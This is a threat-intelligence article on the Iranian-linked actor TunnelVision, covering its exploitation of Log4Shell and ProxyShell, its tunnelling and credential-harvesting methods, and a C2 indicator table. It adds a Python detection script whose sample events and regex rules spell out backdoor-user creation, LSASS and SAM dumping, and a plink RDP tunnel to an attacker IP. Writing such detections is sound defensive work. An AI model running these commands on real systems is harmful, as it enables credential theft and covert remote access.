According to SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky, “TunnelVision actions are characterised by widespread exploitation of 1-day vulnerabilities in target regions, with intrusions spotted in the Middle East and the United States.”
TunnelVision’s activities in target regions are characterised by widespread exploitation of one-day vulnerabilities. We’ve seen widespread exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell), and most recently Log4Shell during the time we’ve been watching this actor. Fast Reverse Proxy Client (FRPC) and Plink are the tunnelling tools most widely used by the organisation.
- SentinelLabs has been monitoring the activities of a threat actor with Iranian ties operating in the Middle East and the United States.
- We’ve called this cluster of activity TunnelVision because of the threat actor’s extensive dependence on tunnelling tools and the unique way it chooses to widely deploy them.
- TunnelVision’s operations were linked to the distribution of ransomware, making the group a potentially damaging actor, similar to other Iranian threat actors active in the region recently.
Most of the “online” activity was carried out through the actor’s PowerShell backdoor, which appears to be a modified version of a public PowerShell one-liner.
Among those activities were:
- Execution of recon commands.
- Creation of a backdoor user and adding it to the administrators group.
- Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
- Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
- Execution of a reverse shell utilizing the VMware Horizon NodeJS component [1,2].
- Internal subnet RDP scan using a publicly available port scan script.
Throughout the activity, the threat actor hosted its payloads in a GitHub repository named “VmWareHorizon” under the account “protections20”, which the actor controlled.
Successful Log4Shell exploitation of VMware Horizon shows up on the host as a malicious process spawned by the Horizon Tomcat service, ws_TomcatService.exe (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe).
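As an added example (not SentinelLabs’ code and not taken from the report), the detection logic below runs constructed Sysmon Event ID 1 (process creation) records through rules for the tradecraft listed above: a child of ws_TomcatService.exe, backdoor-user creation and Administrators-group membership, LSASS dumping with Procdump or comsvcs MiniDump, SAM hive export, and RDP tunnelling over Plink or ngrok. The rule names, regular expressions and sample events are assumptions made for this example; only the binary path and the 51.89.178.210 tunnelling-server address come from the page.

```python
"""Hunt for TunnelVision-style post-exploitation on a VMware Horizon host.

Added example, not SentinelLabs' code. It scores Sysmon Event ID 1
(process creation) records against the tradecraft described above:
  * any child process of the Horizon Tomcat service ws_TomcatService.exe,
    which is where a successful Log4Shell exploit lands;
  * backdoor-user creation and additions to the local Administrators group;
  * credential dumping via Procdump, comsvcs.dll MiniDump or SAM hive export;
  * Plink / ngrok / FRPC tunnelling of RDP (port 3389).
Rule names and regexes are this example's own; the sample events are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

HORIZON_TOMCAT = "ws_tomcatservice.exe"

# (rule name, pattern applied to CommandLine); case-insensitive so
# "NET LOCALGROUP Administrators" and "hklm\SAM" still match.
RULES = [
    ("backdoor_user",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)),
    ("admin_group_add",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("lsass_dump_procdump",
     re.compile(r"procdump(64)?(\.exe)?\b.*\s-m[am]\s.*lsass", re.I)),
    ("lsass_dump_comsvcs",
     re.compile(r"rundll32(\.exe)?\b.*comsvcs(\.dll)?[ ,]+MiniDump\b", re.I)),
    ("sam_hive_dump",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("rdp_tunnel",
     re.compile(r"\b(plink|ngrok|frpc)(\.exe)?\b.*\b3389\b", re.I)),
]


@dataclass
class Hit:
    rule: str
    image: str
    command_line: str


def detect(event: dict) -> list[Hit]:
    """Return every rule a single process-creation event matches."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    parent_exe = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    hits: list[Hit] = []
    # Horizon's Tomcat should never spawn interactive tooling; any child is
    # worth a look, whatever the command line says.
    if parent_exe == HORIZON_TOMCAT:
        hits.append(Hit("horizon_tomcat_child", image, cmd))
    hits.extend(Hit(name, image, cmd) for name, rx in RULES if rx.search(cmd))
    return hits


def hunt(events: list[dict]) -> dict[str, int]:
    """Tally rule hits over a batch of events (the number an analyst triages)."""
    counts: dict[str, int] = {}
    for ev in events:
        for hit in detect(ev):
            counts[hit.rule] = counts.get(hit.rule, 0) + 1
    return counts


# Constructed sample events; only the Tomcat path and the tunnelling-server
# address (51.89.178.210, from the IoC table) come from the report.
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"ParentImage": TOMCAT,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX(...)"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user support1 P@ssw0rd! /add"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\net1.exe",
     "CommandLine": "net1 localgroup Administrators support1 /add"},
    {"ParentImage": CMD, "Image": r"C:\temp\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\temp\l.dmp"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\temp\sam.hiv"},
    {"ParentImage": CMD, "Image": r"C:\temp\plink.exe",
     "CommandLine": "plink.exe -N -R 3389:127.0.0.1:3389 -pw ... tunnel@51.89.178.210"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\admin\notes.txt"},  # benign control
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for hit in detect(ev):
            print(f"{hit.rule:22} {hit.image} :: {hit.command_line}")
    print(hunt(SAMPLE_EVENTS))
```

The parent-process rule is the durable one: renaming plink.exe or procdump64.exe defeats the command-line patterns, but nothing the actor does changes the fact that the first foothold is a child of ws_TomcatService.exe. FRPC takes its ports from a config file rather than the command line, so the rdp_tunnel rule needs a file-creation companion to catch it.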
Finally, the researchers concluded: “The cybersecurity firm linked the attacks to a different Iranian cluster, not because they’re unrelated, but because there is currently insufficient data to classify them as identical to any of the aforementioned attributions.”
Indicators of Compromise
| Type | Indicator | Description |
|---|---|---|
| Domain | www[.]microsoft-updateserver[.]cf | Command and Control (C2) Server |
| IP | 51.89.169[.]198 | Command and Control (C2) Server |
| IP | 142.44.251[.]77 | Command and Control (C2) Server |
| IP | 51.89.135[.]142 | Command and Control (C2) Server |
| IP | 51.89.190[.]128 | Command and Control (C2) Server |
| IP | 51.89.178[.]210 | Command and Control (C2) Server, Tunneling Server |
| GitHub Account | https://github.com/protections20 | Account utilized to host payloads |